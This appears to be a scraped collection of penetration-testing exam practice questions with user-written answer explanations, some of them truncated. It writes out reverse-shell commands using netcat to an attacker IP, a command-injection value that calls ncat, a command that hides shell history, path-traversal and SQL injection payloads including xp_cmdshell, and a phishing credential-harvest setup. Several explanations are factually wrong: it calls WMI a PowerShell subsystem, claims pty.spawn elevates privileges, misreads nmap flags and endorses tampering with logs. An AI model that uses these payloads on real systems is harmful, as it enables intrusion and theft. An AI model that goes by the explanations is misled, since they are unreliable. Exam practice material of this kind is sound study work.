For the tool selection: Given that this is a web application assessment and we are investigating the robots.txt file, WPScan would be the most suitable tool to use for further investigation, assuming the web application is based on WordPress. WPScan is specifically designed to scan WordPress websites for vulnerabilities. For the entries in the robots.txt file that should be recommended for removal: Allow: /admin - This entry allows web crawlers to access the admin directory, which could expose sensitive information. Allow: /wp-login.php - Allowing access to the WordPress login page through robots.txt could attract unwanted attention from attackers. Both of these entries expose sensitive areas of the web application to potential attackers and should be removed.
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective? A. Alternate data streams B. PowerShell modules C. MP4 steganography D. ProcMon
From the reference link, I see this: "Windows Management Instrumentation (WMI) is a subsystem of PowerShell that gives admins access to powerful system monitoring tools." This makes powershell the correct answer.
Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue? A. Peach B. WinDbg C. GDB D. OllyDbg
GDB (GNU Debugger) is a popular debugger for the Unix-like systems, and it can be used to analyze binaries, including stepping through code, inspecting variables, and much more. Other options like Peach (a fuzzing tool), WinDbg (a Windows debugger), and OllyDbg (a 32-bit assembler level analyzing debugger for Microsoft Windows) wouldn't be suitable for analyzing a 64-bit Linux binary.
A security analyst needs to perform an on-path attack on BLE smart devices. Which of the following tools would be BEST suited to accomplish this task? A. Wireshark B. Gattacker C. tcpdump D. Netcat
Gattacker is a tool used to exploit Bluetooth Low Energy (BLE) devices. It can be used to identify and exploit vulnerabilities in smart devices, such as home automation products, fitness trackers, data collection tools, and more. Gattacker can be used to gain access to sensitive information or control the devices remotely, so it is important to follow best practices for IoT security and restrict access to BLE smart devices to protect against
A penetration tester is conducting a penetration test and discovers a vulnerability on a web server that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell. Enumerating the server for privilege escalation, the tester discovers the following: netstat -antu Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 10.1.1.24:48850 24.176.9.43:59036 ESTABLISHED tcp 0 0 0.0.0.0:22 :0.0.0.0* LISTEN
Given that netstat -antu shows a high number of foreign IP connections established on the server, the penetration tester should investigate these connections further. This could potentially indicate that the server has been compromised by an attacker, or that there is unauthorized access to the server from outside sources. Therefore, the NEXT step that the penetration tester should take is to investigate the high numbered port connections further (Option C). This could involve examining the source IP addresses and ports of the connections, as well as any associated processes or services. The tester should also determine if any of the connections are associated with known malicious activity.
A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server? A. OpenVAS B. Nikto C. SQLmap D. Nessus
Given that the target is a database server, the BEST tool to use for finding vulnerabilities specifically related to databases, such as SQL injection, would be: C. SQLmap
A penetration tester runs a scan against a server and obtains the following output: 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-12-20 09:23AM 331 index.aspx | ftp-syst: 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2012 Std 3389/tcp open ssl/ms-wbt-server Irdp-ntlm-info: | Target_Name: WEB3 | NetBIOS_Computer_Name: WEB3 | Product Version: 6.3.9600 S
I choose A. Since FTP allows anonymous login it would be easiest to just log into FTP.
For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information: Wh
I will go with A here as this explanation is what makes sense Out of the options provided, the correct line of code to achieve this goal is A. window.location = 'https://evilcorp.com'. This line of code redirects the user's browser to the specified URL, which in this case is the legitimate website of the organization being impersonated. This will make the user believe that their password change was successful, while the attacker harvests their credentials for malicious purposes.
A penetration tester is attempting to discover live hosts on a subnet quickly.Which of the following commands will perform a ping scan? A. nmap -sn 10.12.1.0/24 B. nmap -sV -A 10.12.1.0/24 C. nmap -Pn 10.12.1.0/24 D. nmap -sT -p- 10.12.1.0/24
Option A, nmap -sn 10.12.1.0/24, will perform a ping scan to discover live hosts on the subnet quickly. The -sn option specifies a "ping scan" to discover hosts on the network by sending an ICMP echo request (ping) to each IP address in the specified range. This is a quick way to identify which hosts are up and running without performing a full port scan or attempting to connect to any services. Option B, nmap -sV -A 10.12.1.0/24, is a service and version detection scan with aggressive options, which is not the best option to discover live hosts on the subnet. Option C, nmap -Pn 10.12.1.0/24, is a scan that disables host discovery, which means it will attempt to scan every IP address in the specified range, regardless of whether or not a host is responding to pings. This is not the best option to discover live hosts on the subnet quickly. Option D, nmap -sT -p- 10.12.1.0/24, is a TCP connect scan that scans all ports on each host in the specified range, which is not the best option to discover live hosts on the subnet quickly.
A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log: Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?
Option D is the first step because it captures the network traffic between the application and the server. This will help identify the TCP ports used by the application. Option B is the next step because it involves running the application attached to a debugger, which will help determine the location of the encryption code. Therefore, the correct order of steps is D, followed by B.
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance? A. Shodan B. Nmap C. WebScarab-NG D. Nessus
Passive reconnaissance involves collecting information without directly interacting with the target system. In the context of Internet of Things (IoT) devices, a tool that can search for devices based on their characteristics, vendor information, and other details without direct interaction would be useful. Given these considerations, the MOST useful tool in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance would be:
During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout? A. Mask B. Rainbow C. Dictionary D. Password spraying
Password spraying is a type of attack where the attacker attempts to access a large number of accounts (usernames) using a few common passwords. Unlike traditional brute-force or dictionary attacks, which try many passwords on a single user, password spraying tries only a few passwords across many accounts. This method is often used to avoid triggering account lockout mechanisms, making it a suitable choice for the scenario described.
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internalSendmail server. To remain stealthy, the tester ran the following command from the attack machine: ssh [email protected] -L5555:10.10.1.2:25 Which of the following would be the BEST command to use for further progress into the targeted network? A. nc 10.10.1.2 B. ssh 10.10.1.2 C. nc 127.0.0.1 5555 D. ssh 127.0.0.1 5555
Port 25 from the remote host is forwarded to local port 5555 (to IP: 10.10.1.2). So if you have forwarded the port to yourself, it means you can access it by connecting to 127.0.0.1 or 10.10.1.2. Next part of the pentester task is to determine what service is opened on 25 or what communication is sent on internal service. Quickest way to do this is to use netcat. A - port 5555 is not specified B - port 5555 is not specified, why would you ssh to smtp port with sendmail server? C - correct, netcat may be utilized to "progress into the targeted network" and test SMTP. D - if there is no ssh connection on port 25 it is useless as above in B. Syntax is wrong, to specify port on ssh you need to use -p.
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.Which of the following is the penetration tester trying to accomplish? A. Uncover potential criminal activity based on the evidence gathered. B. Identify all the vulnerabilities in the environment. C. Limit invasiveness based on scope. D. Maintain confidentiality of the findings.
SQLmap and WPScan are going to identify vulnerabilities in the DBs and websites. Are they going to identify server OS, hypervisor, workstation, firewall, storage system, etc. vulnerabilities? No. So it isn't trying to find ALL vulnerabilities, it's limiting the scope. The answer is C.
A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host.Which of the following utilities would BEST support this objective? A. Socat B. tcpdump C. Scapy D. dig
Scapy is a powerful Python-based tool that allows for the creation, manipulation, and transmission of network packets. It provides great flexibility in crafting and sending packets, including the ability to create and send specially crafted DNS query responses, making it an ideal tool for an on-path attack position like the one described in the question. The other tools mentioned have different purposes: Socat is used for relaying data between various sockets, tcpdump is used for capturing and analyzing network traffic, and dig is used for querying DNS servers. So the correct answer to this question is:
A penetration tester uncovered a flaw in an online banking web application that allows arbitrary requests to other internal network assets through a server-side request forgery. Which of the following would BEST reduce the risk of attack? A. Implement multifactor authentication on the web application to prevent unauthorized access of the application. B. Configure a secret management solution to ensure attackers are not able to gain access to confidential information. C. Ensure a patch managem
Server-side request forgery occurs when an attacker can manipulate a web application to send a request on behalf of the application to an internal network asset. By sanitizing and validating all input within the web application, the application can prevent an attacker from injecting malicious code or requests that could result in unauthorized access to internal resources. Implementing multifactor authentication (A), configuring a secret management solution (B), and ensuring a patch management system is in place (C) are important security measures but they do not directly address the server-side request forgery vulnerability in the web application. Enabling enhanced logging (E) can help in detecting an attack, but it is not a solution to prevent the attack from happening in the first place. Therefore, D is the BEST option to reduce the risk of attack.
A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive? A. Nmap -s 445 -Pn -T5 172.21.0.0/16 B. Nmap -p 445 -n -T4 -open 172.21.0.0/16С. Nmap -sV --script=smb* 172.21.0.0/16 D. Nmap -p 445 -max -sT 172. 21.0.0/16
The best option for quickly scanning an SMB port on a /16 network when stealth is not a concern is to use option B: "Nmap -p 445 -n -T4 -open 172.21.0.0/16". Explanation: Option A ("-s 445 -Pn -T5") will scan for the SMB port, disable host discovery (-Pn), and set the timing template to aggressive (-T5). However, this command will not scan the entire /16 network, but only the single port 445. Option B ("-p 445 -n -T4 -open") will scan for the SMB port, skip the host discovery (-n), set the timing template to normal (-T4), and only show open ports (-open). This command will scan the entire /16 network for the specified port.
A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system After running a few commands, the tester runs the following: python -c 'import pty; pty.spawn("/bin/bash")' Which of the following actions Is the penetration tester performing? A. Privilege escalation B. Upgrading the shell C. Writing a script for persistence D. Building a bind shell
The code python -c 'import pty; pty.spawn("/bin/bash")' is a Python command that is being run in the command shell of the compromised system. The command is executing a Python script in-line (using the -c flag) that does two things: Imports the pty module: This module provides functionality for spawning a new pseudo-terminal (pty) on the current terminal session. This allows the tester to interact with the shell in a more efficient and interactive way. Spawns a new shell with elevated privileges: The pty.spawn("/bin/bash") method spawns a new bash shell (/bin/bash) with elevated privileges. This is because the current shell that the tester has access to may not have all the necessary permissions to perform certain actions, such as accessing sensitive files or executing certain system commands. By spawning a new shell with elevated privileges, the tester is able to bypass these restrictions and perform a wider range of actions.
A penetration tester gives the following command to a systems administrator to execute on one of the target servers: rm -f /var/www/html/G679h32gYu.php Which of the following BEST explains why the penetration tester wants this command executed? A. To trick the systems administrator into installing a rootkit B. To close down a reverse shell C. To remove a web shell after the penetration test D. To delete credentials the tester created
The command "rm -f /var/www/html/G679h32gYu.php" is used to delete a file named "G679h32gYu.php" from the directory "/var/www/html/". Based on this information, the BEST explanation for why the penetration tester wants this command executed is: C. To remove a web shell after the penetration test The file "G679h32gYu.php" may be a web shell that was uploaded by the penetration tester during the course of the penetration test. Web shells are scripts that can be uploaded to a web server to enable remote access and control of the server. Removing the web shell after the penetration test is complete is a good security practice to ensure that unauthorized access to the server is prevented.
Which of the following protocols or technologies would in-transit confidentially protection for emailing the final security assessment report? A. S/MIME B. FTPS C. DNSSEC D. AS2
The correct answer is A. S/MIME. S/MIME (Secure/Multipurpose Internet Mail Extensions) is a protocol used to encrypt emails and provide in-transit confidentiality protection, making it the best option for securely emailing the final security assessment report. Option B, FTPS (File Transfer Protocol Secure), is a protocol used to securely transfer files between two computers over the internet, but it does not provide in-transit confidentiality protection for emails, making it the incorrect option for the question asked. Option C, DNSSEC (Domain Name System Security Extensions), is a protocol used to authenticate and secure domain name information, but it does not provide confidentiality protection for emails, making it the incorrect option for the question asked. Option D, AS2 (Applicability Statement 2), is a protocol used to exchange business documents securely over the internet, but it does not provide in-transit confidentiality protection for emails, making it the incorrect option for the question asked.
A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.Which of the following should be included as a recommendation in the remediation report? A. Stronger algorithmic requirements B. Access controls on the server C. Encryption on the user passwords D. A patch management program
The correct answer is A. Stronger algorithmic requirements. MD5 hashes are weaker than other hashing algorithms, such as SHA-256, which are much more difficult to crack with rainbow tables. Therefore, the penetration tester should recommend that the server use a stronger algorithm to hash passwords, such as SHA-256. This will ensure that passwords remain secure and cannot be easily cracked using rainbow tables. Option B is incorrect because access controls are related to user authentication, not hashing algorithms. Option C is incorrect because encryption is used to secure data in transit, not to secure user passwords. Option D is incorrect because patch management programs are related to updating software, not to the security of user passwords.
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal? A. VRFY and EXPN B. VRFY and TURN C. EXPN and TURN D. RCPT TO and VRFY
The correct answer is A. VRFY and EXPN. The VRFY command is used to verify whether a particular user account exists on the server. It will send a response indicating whether the user exists or not. The EXPN command is used to expand a mailing list, allowing the tester to see the members of that list. Together, these two commands can be used to identify all of the user accounts that exist on the server. Option B is incorrect because the TURN command is used to reverse the direction of an SMTP conversation, allowing the client to become the server and the server to become the client. It is not used to identify user accounts. Option C is incorrect because the EXPN command is used to expand a mailing list, not to identify user accounts. The TURN command is used to reverse the direction of an SMTP conversation, not to identify user accounts. Option D is incorrect because the RCPT TO command is used to specify the recipient of an email message, not to identify user accounts. The VRFY co
A penetration tester ran a ping `"A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type? A. Windows B. Apple C. Linux D. Android
The correct answer is A. Windows. Windows systems typically return 128 TTL packets when a ping command is executed. This is because Microsoft Windows systems use a static TTL value of 128 for ICMP packets. A static TTL value is a fixed number set by the operating system. Option B. Apple is incorrect. Apple systems typically return a TTL of 64 when a ping command is executed. Option C. Linux is incorrect. Linux systems typically return a TTL of 64 when a ping command is executed. Option D. Android is incorrect. Android systems typically return a TTL of 255 when a ping command is executed.
A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists. Which of the following should be the FIRST step to plan the reconnaissance activities? A. Launch an external scan of netblocks. B. Check WHOIS and netblock records for the company. C. Use DNS lookups and dig to determine the external hosts. D. Conduct a ping sweep of the company's netblock
The correct answer is B. Check WHOIS and netblock records for the company. B: Checking WHOIS and netblock records for the company is the best option to start the reconnaissance activities. WHOIS records are a good source of information to understand the scope of the network and the range of IP addresses used by the company. Netblock records, on the other hand, provide information on the Internet Service Provider (ISP) used by the company and the type of services they provide. This information can be used to identify potential vulnerabilities that can be exploited. A: Launching an external scan of netblocks is not the first step for the tester to plan their reconnaissance activities. This type of scan is used to detect open ports on a system, which is not useful in the initial stages of planning reconnaissance activities. C: Using DNS lookups and dig to determine the external hosts is not the first step for the tester to plan their reconnaissance activities. DNS lookups and dig can
A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high. Which of the following should be the NEXT step? A. Perform a new penetration test. B. Remediate the findings. C. Provide the list of common vulnerabilities and exposures. D. Broaden the scope of the penetration test.
The correct answer is B. Remediate the findings. Once the board has accepted the penetration test report, the next step should be to take action to address the findings that have been identified. Remediation of the findings is the most essential step to ensure the security of the system and should be the priority before any additional testing is done. Option A: Perform a new penetration test is incorrect because it is unnecessary at this point. The board has already accepted the existing report and the findings should be addressed first. Option C: Provide the list of common vulnerabilities and exposures is incorrect because this is not the next step after the board has accepted the report. The list of common vulnerabilities and exposures should have been identified as part of the initial test and included in the report. Option D: Broaden the scope of the penetration test is incorrect because it is unnecessary at this point. The board has already accepted the existing report and the findings should be addressed first.
Which of the following provides a matrix of common tactics and techniques uses by attackers along with recommended mitigations? A. NIST SP 800-53 B. OWASP Top 10 C. MITRE ATT&CK framework D. PTES technical guidelines
The correct answer is C. MITRE ATT&CK framework. The MITRE ATT&CK framework is a matrix of common tactics and techniques used by attackers, along with recommended mitigations. The matrix is organized based on the stages of an attack, such as initial access, execution, and defense evasion. It is used by security professionals to better understand attackers' tactics and techniques, and to develop better strategies to defend against them. Option A, NIST SP 800-53, is an information security standard published by the National Institute of Standards and Technology (NIST) that provides specific security requirements for federal information systems. It does not provide a matrix of common tactics and techniques used by attackers along with recommended mitigations. Option B, OWASP Top 10, is a list of the 10 most critical web application security risks developed by the Open Web Application Security Project (OWASP). It does not provide a matrix of common tactics and techniques used by attac
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter, with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company? A. Data flooding B. Session riding C. Cybersquatting D. Side channel
The most concerning attack type to the company is D. Side Channel Attacks. Side channel attacks are a type of attack that allows an attacker to obtain privileged information (such as passwords, encryption keys, etc.) by exploiting the physical characteristics of the computer system. For example, an attacker could measure the power consumption of the system over time to infer the encryption key used. In this case, the company is concerned about the protection of its VMs, which are hosted in a datacenter with other companies sharing physical resources. Thus, a side channel attack is the most concerning attack type as it could potentially allow an attacker to gain access to the VMs without needing to compromise the security of the cloud provider. The other options are not as concerning as side channel attacks, as they typically involve the attacker gaining access to a user's session (Session Riding) or hijacking a domain name (Cybersquatting), or overwhelming a system with malicio
After running the enum4linux.pl command, a penetration tester received the following output: Enumerating Workgroup/Domain on 192.168.100.56 [+] Got domain/workgroup name: WORKGROUP Session Check on 192.168.100.56 ======== === [+] Server 192.168.100.56 allows sessions using username, password Getting domain SID for 192.168.100.56 Domain Name: WORKGROUP Domain Sid: (NULL SID) === [+] Can't determine if host is part of domain or part of a workgroup I Share Enumeration on 192.168.100.56 Sharename T
This command would allow the penetration tester to retrieve files from the 'web' share, which was successfully mapped and listed during the previous step. smbget is a utility that can be used to download files from SMB/CIFS servers, and it can be used to retrieve files from a remote share. Option A attempts to print to the 'print$' share, which was denied. Option B would simply list the available shares on the target host, which the penetration tester has already done. Option D would allow the penetration tester to interact with the 'web' share as if it were a remote filesystem, but it is not necessary to do so at this point, as the goal is simply to gather more information about the share.
A penetration tester successfully infiltrated the targeted web server and created credentials with administrative privileges. After conducting data exfiltration, which of the following should be the tester's NEXT step? A. Determine what data is available on the web server. B. Change or delete the logs. C. Log out and migrate to a new session. D. Log in as the new user.
This step helps in covering the tracks of the tester and makes it more difficult for defenders to understand exactly what was done during the penetration test. This is a typical step in the post-exploitation phase of a penetration test, especially when the goal is to simulate the behavior of an actual attacker and assess the organization's ability to detect and respond to the breach. The other options do not follow the logical progression of a penetration test after the described actions have already been taken.
During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data? A. Vulnerability scanning B. Network segmentation C. System hardening D. Intrusion detection
To be PCI compliant and protect sensitive customer information such as addresses, phone numbers, and credit card numbers, the company should have implemented B. Network segmentation.
A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the number of the service. Which of the following methods would BEST support validation of the possible findings? A. Manually check the version number of the VoIP service against the CVE release. B. Test with proof-of-concept code from an exploit database on a non-production system. C. Review SIP traffic from an on-path
To validate the possible findings related to the newly released CVEs on a VoIP call manager, it's essential to confirm that the identified vulnerabilities are indeed present in the specific version of the service running. Among the given options, the BEST method for achieving this would be: A. Manually check the version number of the VoIP service against the CVE release. Explanation: This option involves manually comparing the version number of the VoIP service with the information provided in the CVE release. By doing so, the penetration tester can directly confirm whether the identified vulnerabilities apply to the version in use. This is a precise and careful approach that avoids unnecessary risks. Other options are not as suitable for validation:
During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue? A. Changing to Wi-Fi equipment that supports strong encryption B. Using directional antennae C. Using WEP encryption D. Disabling Wi-Fi Reveal Solution
Using Aircrack-ng, an attacker can crack Wi-Fi networks that are protected using weak encryption methods. The best way to remediate this issue is to ensure that the Wi-Fi equipment supports strong encryption standards like WPA2 or WPA3. Therefore, the correct option is: A. Changing to Wi-Fi equipment that supports strong encryption.
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems: A. will reveal vulnerabilities in the Modbus protocol B. may cause unintended failures in control systems C. may reduce the true positive rate of findings D. will create a denial-of-service condition on the IP networks
Vulnerability scanners are designed to identify weaknesses and security flaws in networked systems. However, running a vulnerability scanner on a hybrid network segment introduces the risk of inadvertently triggering unexpected behaviors or failures in control systems. This can occur due to factors such as the scanner's network traffic, scanning techniques, or the vulnerabilities being scanned. A. will reveal vulnerabilities in the Modbus protocol - Incorrect. Vulnerability scanners are designed to detect known vulnerabilities in common operating systems, software, and applications. They are not designed to detect vulnerabilities in specific protocols such as Modbus. C. may reduce the true positive rate of findings - Incorrect. Vulnerability scans are designed to detect known vulnerabilities, and the true positive rate of findings is increased, not reduced, by running a scan on a hybrid network. D. will create a denial-of-service condition on the IP networks - Incorrect. While ru
A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website? A. WHOIS domain lookup B. Job listing and recruitment ads C. SSL certificate information D. Public data breach dumps
WHOIS domain lookup is the BEST passive method of obtaining the technical contacts for the website. WHOIS lookup provides registration details for the domain name, including the contact information of the domain owner and technical contacts.
A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid? A. Crawling the web application's URLs looking for vulnerabilities B. Fingerprinting all the IP addresses of the application's servers C. Brute forcing the application's passwords D. Sending many web requests per second to test DDoS protection
since its a shared network bandwidth on a dedicated server, the other clients are been hosted on the same server. sending to many web request could overwhelm the server which will cause denial of service for the other clients.
A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog: (website url)/catalog.asp?productid=22 The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes: (website url)catalog.asp?productid=22;WAITFOR DELAY'00:00:05' Which of the following should the penetration tester attempt NEXT? A. catalog.asp?productid=22:EXEC xp_cmdshell 'whoami' B. Is a boolean SQL injectio
the application is vulnerable to SQL injection by observing the delay when the URL was altered to include a "WAITFOR DELAY" statement. It could either be B or C because both are SQL injection attacks. B is a more common SQL injection attack though so I think a penetration tester would use that one first. I choose B.
to connect to the attacking machine from the victim machine
to connect to the attacking machine from the victim machine, you would enter the command " nc 192.168.1.53 31337 -e /bin/sh" on it
Your team successfully gains access to a Linux server on the ABC network. Assist your team with identify the Linux commands to execute by matching them to the appropriate definitions. commands: find / -perm -u=s -exec ls -al >/dev/null {} \; attack host: nc -lvp 4444 target host: nc -e /bin/bash [attack host] 4444 unset HISTFILE cat /etc/passwd | cut -d: -f1 sudo -l what they do: ensure commands don't log remote shell identify users identify privileges identify SETUID programs
unset HISTFILE = ensure commands don't log (the unset command syntax prevents the curren shell from logging commands) attack host: nc -lvp 4444 target host: nc -e /bin/bash [attack host] 4444 = remote shell sudo -l = identify privileges cat /etc/passwd | cut -d: -f1 = identify users (the cat command syntax passes the output of the passwd file to the cu command and only prints user values) find / -perm -u=s -exec ls -al >/dev/null {} \; = identify SETUID programs (the find command syntax is used to identify setuid programs that could be used to escalate privileges)
Which of the following expressions in Python increase a variable val by one? (Choose two.) A. val++ B. +val C. val=(val+1) D. ++val E. val=val++ F. val+=1
val=(val+1) val+=1
A penetration tester is validating whether input validation mechanisms have been implemented in a web application.Which of the following should the tester use to determine whether the application is vulnerable to path traversal attacks? A. GET /image?filename-..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts B. GET /image?filename=lefitfe;pwd C. POST /image?filename - D. POST /image?filename =yhtak;ncat --ssl 192.168.0.1 2222
To determine whether the application is vulnerable to path traversal attacks, the penetration tester should use the following GET request: A. GET /image?filename-...%2f...%2f...%2f...%2f...%2f...%2fetc%2fhosts Path traversal attacks aim to access files and directories that are stored outside the web root folder by manipulating variables that reference files with "dot-dot-slash (.../)" sequences and its variations or by using absolute file paths. In option A, the filename parameter is manipulated to include multiple ".../" sequences to traverse up the directory tree and access the /etc/hosts file. Option B (GET /image?filename=lefitfe;pwd) is not related to path traversal attacks. Option C (POST /image?filename -) and option D (POST /image?filename =yhtak;ncat --ssl 192.168.0.1 2222) do not involve GET requests and are not related to path traversal attacks.
A security analyst is conducting an unknown environment test from 192.168.3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems.Which of the following Nmap commands should the analyst use to achieve this objective? A. nmap -F 192.168.5.5 B. nmap -datalength 2 192.168.5.5 C. nmap -D 0.5.2.2 192.168.5.5 D. nmap -scanflags SYNFIN 192.168.5.5
To limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems, the security analyst should use the following Nmap command: C. nmap -D 0.5.2.2 192.168.5.5 The -D option is used to specify decoy IP addresses to be used as a decoy for the actual IP address of the penetration tester. This makes it difficult for intrusion detection systems to detect the actual IP address of the penetration tester. Option A (nmap -F 192.168.5.5) is used to perform a fast scan by scanning only the most common ports. This option does not help in limiting observation of the penetration tester's activities. Option B (nmap -datalength 2 192.168.5.5) is used to specify the length of data in each probe packet. This option does not help in limiting observation of the penetration tester's activities. Option D (nmap -scanflags SYNFIN 192.168.5.5) is used to set TCP flags in packets sent during scanning. This option does not
A penetration tester found several critical SQL injection vulnerabilities during an assessment of a client's system. The tester would like to suggest mitigation to the client as soon as possible. Which of the following remediation techniques would be the BEST to recommend? (Choose two.) A. Closing open services B. Encryption users' passwords C. Randomizing users' credentials D. Users' input validation E. Parameterized queries F. Output encoding
To mitigate SQL injection vulnerabilities, the best remediation techniques generally involve handling user input securely and managing how queries are constructed. Therefore, the best recommendations from the given options would be: D. Users' input validation E. Parameterized queries
Which of the following concepts defines the specific set of steps and approaches that are conducted during a penetration test? A. Scope details B. Findings C. Methodology D. Statement of work
C. Methodology is the correct answer. Methodology is the specific set of steps and approaches that are conducted during a penetration test. Scope details defines the scope of the penetration test, such as the type of systems, services, or applications to be tested. Findings are the results of the penetration test, such as any vulnerabilities or misconfigurations discovered. The Statement of Work outlines the expected deliverables, timeline, and cost of the penetration test.
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel.Which of the following would the tester MOST likely describe as a benefit of the framework? A. Understanding the tactics of a security intrusion can help disrupt them. Most Voted B. Scripts that are part of the framework can be imported directly into SIEM tools. C. The methodology can be used to estimate the cost of an incident better. D. The framework is static and ensures stability of a security program over time.
. Understanding the tactics of a security intrusion can help disrupt them. The MITRE ATT&CK framework is a widely used method for describing the tactics, techniques, and procedures (TTPs) used by attackers in cyber security incidents. One of the main benefits of the framework is that it can help organizations understand the tactics used by attackers, and therefore, take steps to disrupt them or improve their defense against them. By understanding the tactics and techniques used by attackers, organizations can better identify and mitigate potential threats to their systems and data. Other benefits of the MITRE ATT&CK framework include that it can be used to help prioritize security efforts, assess the effectiveness of security controls, and measure an organization's readiness to defend against attacks. However, it should be noted that the framework is not a static one, and it's updated regularly to reflect new threats and techniques
During the reconnaissance phase, a penetration tester obtains the following output: Reply from 192.168.1.23: bytes=32 time<54ms TTL=128 Reply from 192.168.1.23: bytes=32 time<53ms TTL=128 Reply from 192.168.1.23: bytes=32 time<60ms TTL=128 Reply from 192.168.1.23: bytes=32 time<51ms TTL=128 Which of the following operating systems is MOST likely installed on the host? A. Linux -В. NetBSD C. Windows D. macOS
128 is the default TTL (time to live) value for most Windows distros.
A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision? A. The tester had the situational awareness to stop the transfer. B. The tester found evidence of prior compromise within the data set. C. The tester completed the assigned part of t
A Because access to confidential information is explicitly out of scope, it would have been both unethical and illegal for the tester to continue. Good penetration-testers are mindful not to violate the ROE and laws during their tests.
The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform? A. A vulnerability scan B. A WHOIS lookup C. A packet capture D. An Nmap scan
A A vulnerability scan is a type of penetration testing tool that is used to scan a network for vulnerabilities. A vulnerability scan can detect misconfigurations, missing patches, and other security issues that could be exploited by attackers. In this case, the output shows that 100 hosts had findings due to improper patch management, which means that the tester performed a vulnerability scan
A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use? A. nmap -sn 192.168.0.1/16 B. nmap -sn 192.168.0.1-254 C. nmap -sn 192.168.0.1 192.168.0.1.254 D. nmap -sN 192.168.0.0/24
A Class C network typically has a /24 subnet mask, and if the goal is to quickly identify active systems within that network, the penetration tester would likely want to perform a ping sweep. Among the provided options, the correct command for this task is: B. nmap -sn 192.168.0.1-254 Explanation: Option B: This command uses the "-sn" flag (No port scan) to perform a ping sweep, targeting all IP addresses in the range from 192.168.0.1 to 192.168.0.254. This range encompasses the entire Class C network. Option A uses a /16 CIDR notation, which covers a Class B network and will scan a much larger range of IP addresses than necessary. Option C includes an extra dot in the IP range, which will cause an error in the nmap command. Option D uses the -sN flag, which is used for TCP NULL scans, and does not scan for active systems.
A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment? A. The web server is using a WAF. B. The web server is behind a load balancer. C. The web server is redirecting the requests. D. The local antivirus on the web server Is rejecting the connection.
A Web Application Firewall (WAF) is designed to protect web applications from various attacks, including those initiated by penetration testers. It analyzes incoming requests and may terminate or reset connections when it detects suspicious or malicious activity. This includes resetting TCP connections when it identifies potentially harmful requests or traffic patterns.
A penetration tester uncovers access keys within an organization's source code management solution. Which of the following would BEST address the issue? (Choose two.) A. Setting up a secret management solution for all items in the source code management system B. Implementing role-based access control on the source code management system C. Configuring multifactor authentication on the source code management system D. Leveraging a solution to scan for other similar instances in the source co
